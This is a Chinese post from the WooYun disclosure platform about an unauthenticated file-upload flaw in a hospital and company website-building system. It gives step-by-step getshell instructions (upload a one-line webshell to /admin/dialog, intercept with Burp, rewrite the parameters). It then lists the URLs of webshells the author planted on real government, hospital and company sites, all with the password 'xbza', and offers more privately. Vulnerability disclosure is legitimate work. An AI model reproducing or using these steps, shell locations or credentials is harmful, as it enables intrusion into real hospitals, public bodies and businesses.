WooYun.org

刚发了一个该公司医院建站系统登陆后台SQL注入的洞
审核链接：http://www.wooyun.org/bugs/wooyun-2014-081643/trace/4396818394b9b59fdfdd9a1da75a1883
标题是：某通用医院建站系统登入后台SQL注入,已getshell
里面说的是医院案例，拿到了shell，菜刀连接后，研究了下，发现admin/dialog下的文件存在未授权，其实就是网站上上传功能所存放的地方。

链接为：公司网址/admin/dialog/(里面任意一个文件都可以)
比如：
/admin/dialog/filelist.aspx
/admin/dialog/fileupload.aspx
/admin/dialog/piclist.aspx
等等
官网上显示的医院案例33个，感觉拿这个再发一个好像不太合适，所以决定再去试试公司案例是不是也有未授权访问，一看不得了，189个案例，加上医院的，200+了，这个单独发个就合适了。

这里选择一个公司案例和一个医院案例来做说明，其他案例同理
未授权访问页面有很多，这里选择/admin/dialog/filelist.aspx为例来说明，其他未具体测试，估计都可以
公司案例：
台州政研网 http://www.tzzy.gov.cn/
1. 输入 网址+/admin/dialog/filelist.aspx
这里为http://www.tzzy.gov.cn/admin/dialog/filelist.aspx

2.点击浏览，选择一句话shell，然后点击文件上传，这里需要burp拦截请求，替换url后的参数为Show=true&path=admin/dialog

然后页面会列出admin/dialog下面的文件，即一句话shell上传的目录

因此，一句话地址即为
http://www.tzzy.gov.cn/admin/dialog/201411010646941.aspx 密码：xbza
菜刀连接

公司案例补充一句话地址,证明通用性，密码均为xbza ：
http://www.tzyuanlin.com//admin/dialog/201411010605117.aspx
http://www.zjgengu.com//admin/dialog/201411010609374.aspx
http://www.wljgw.com//admin/dialog/201411010619683.aspx
http://www.tzbfh.com//admin/dialog/201411010619757.aspx
http://www.dhy.cn//admin/dialog/201411010623431.aspx
http://tzwomen.tzdsw.cn/admin/dialog/201411010625816.aspx
...
不够私信
医院案例：
浙江省衢州市人民医院 http://www.qzhospital.com
1. 输入http://www.qzhospital.com/admin/dialog/filelist.aspx

2. 点击浏览，选择一句话shell，然后点击文件上传，这里需要burp拦截请求，替换url后的参数为Show=true&path=admin/dialog

一句话地址：http://www.qzhospital.com//admin/dialog/201411010706103.aspx 密码：xbza

医院案例补充一句话地址,证明通用性，密码均为xbza ：
http://www.lhsfby.com//admin/dialog/20141101072280.aspx
http://www.tzlqey.com//admin/dialog/20141101072330.aspx
...
不够私信